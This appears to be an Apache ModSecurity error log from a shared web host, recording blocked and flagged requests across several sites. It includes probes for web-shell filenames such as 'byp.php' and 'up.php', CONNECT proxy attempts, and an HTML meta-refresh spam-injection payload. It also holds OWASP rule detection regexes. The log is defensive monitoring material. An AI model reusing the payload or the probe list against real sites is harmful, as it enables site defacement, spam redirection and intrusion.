[Mon May 11 22:23:52.655750 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI62Ho_DFxNSZVmaX3O4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:52.656031 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI62Ho_DFxNSZVmaX3O4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:53.068640 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/0x.php
[Mon May 11 22:23:53.174198 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/aaa.php
[Mon May 11 22:23:53.193411 2026] [security2:error] [pid 1534836:tid 1534878] [client 58.240.112.150:34886] ModSecurity: Warning. Match of "rx ^(?i:(?:[a-z]{3,10}\\\\s+(?:\\\\w{3,7}?://[\\\\w\\\\-\\\\./]*(?::\\\\d+)?)?/[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?|connect (?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\.?(?::\\\\d+)?|options \\\\*)\\\\s+[\\\\w\\\\./]+|get /[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?)$" against "REQUEST_LINE" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "47"] [id "920100"] [rev "2"] [msg "Invalid HTTP Request Line"] [data "CONNECT www.baidu.com:443 HTTP/1.1"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "www.baidu.com"] [uri "/"] [unique_id "agI62deaRXe5lR8y0ZOz6gAAAUc"]
[Mon May 11 22:23:53.195673 2026] [:error] [pid 1534836:tid 1534878] [client 58.240.112.150:34886] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:23:53.338713 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/byp.php
[Mon May 11 22:23:53.442211 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/dropdown.php
[Mon May 11 22:23:53.605301 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/mini.php
[Mon May 11 22:23:53.701918 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/new.php
[Mon May 11 22:23:53.800514 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/option.php
[Mon May 11 22:23:53.842290 2026] [security2:error] [pid 1590352:tid 1590410] [client 58.240.112.150:37393] ModSecurity: Warning. Match of "rx ^(?i:(?:[a-z]{3,10}\\\\s+(?:\\\\w{3,7}?://[\\\\w\\\\-\\\\./]*(?::\\\\d+)?)?/[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?|connect (?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\.?(?::\\\\d+)?|options \\\\*)\\\\s+[\\\\w\\\\./]+|get /[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?)$" against "REQUEST_LINE" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "47"] [id "920100"] [rev "2"] [msg "Invalid HTTP Request Line"] [data "CONNECT www.baidu.com:443 HTTP/1.1"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "www.baidu.com"] [uri "/"] [unique_id "agI62a1q0G_aXAqWauT6TgAAAJI"]
[Mon May 11 22:23:53.844715 2026] [:error] [pid 1590352:tid 1590410] [client 58.240.112.150:37393] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:23:53.892703 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI62Ho_DFxNSZVmaX3O4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:53.899719 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/s.php
[Mon May 11 22:23:54.053784 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/size.php
[Mon May 11 22:23:54.154177 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/system_log.php
[Mon May 11 22:23:54.255547 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/tool.php
[Mon May 11 22:23:54.355433 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-admin.php
[Mon May 11 22:23:54.561190 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/albin.php
[Mon May 11 22:23:54.665110 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/autoload_classmap.php
[Mon May 11 22:23:54.809537 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/gg.php
[Mon May 11 22:23:54.908122 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/gifclass.php
[Mon May 11 22:23:55.009506 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/up.php
[Mon May 11 22:23:56.153394 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI63Ho_DFxNSZVmaX3O6QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:56.153686 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI63Ho_DFxNSZVmaX3O6QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:56.890735 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI63Ho_DFxNSZVmaX3O6QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:56.919504 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.920092 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.921353 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.921877 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.923651 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.924107 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:56.924417 2026] [security2:error] [pid 1601130:tid 1601168] [client 27.78.84.116:55003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI63HEgAO_835W6c1mVagAAAFI"]
[Mon May 11 22:23:57.822274 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI63Xo_DFxNSZVmaX3O8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:57.822557 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI63Xo_DFxNSZVmaX3O8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:58.425636 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI63Xo_DFxNSZVmaX3O8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:59.046139 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI633o_DFxNSZVmaX3O8QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:59.046440 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI633o_DFxNSZVmaX3O8QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:59.623719 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI633o_DFxNSZVmaX3O8QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:00.657309 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI64Ho_DFxNSZVmaX3O8gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:00.657596 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI64Ho_DFxNSZVmaX3O8gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:01.195824 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI64Ho_DFxNSZVmaX3O8gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:01.641895 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI64Xo_DFxNSZVmaX3O9AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:01.642203 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI64Xo_DFxNSZVmaX3O9AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:02.007300 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI64Xo_DFxNSZVmaX3O9AAAANE"], referer: https://rentparadise.fr/wp-login.php
